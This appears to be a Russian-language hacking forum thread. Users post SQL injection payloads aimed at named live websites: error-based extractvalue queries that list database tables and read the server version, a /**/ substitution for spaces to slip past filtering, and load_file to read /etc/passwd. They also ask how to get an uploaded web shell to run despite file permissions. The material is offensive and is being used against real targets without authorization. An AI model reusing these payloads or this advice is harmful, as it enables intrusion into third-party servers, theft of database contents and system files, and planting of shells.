Вот пример: Code: http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1 Код ошибки: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.t' at line 1
судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
Заместо пробелов ставил этот символ /**/ Code: http://ppt.ru/info/1'or/**/extractvalue(1,concat(0x3a,(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)))='1 Результат: Просто редирект на главную страницу: http://ppt.ru/ без ошибок и т.д
Есть возможность залить шелл через бекдор, но при заливке через wget,curl или copy - автоматом на любой файл выставляются засратые права не позволяющие его запустить. chmod не помогает права меняются, но на выполнение всё равно нет. В других форматах (не php) пробовал притягивать - та же история. Можно что то придумать чтобы как то получить нормальные права и запустить шелл?
HTML: http://keran.am/catalog/296-fonariki/119-fonar.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
Попробуй залить другой, мог антивирус сервака удалить. Или там права на файлы поставлены тогда да, надо как то обходить
Имеется sql-inj через нее можно смотреть файлы ....mid((cast(concat(load_file(/etc/passwd),..... Возможно ли вывод load_file сделать в base64?
Эм sql на файлы ?! Это как, не я не чего против не имею может просто не знал, если кто прошаренный киньте ссылку на подробное описани
Я наверно немножко неправильно выразился: "Load File: Читает содержимое файла и возвращает его в виде строки." Если у пользователя достаточно прав Но вопрос остается открытым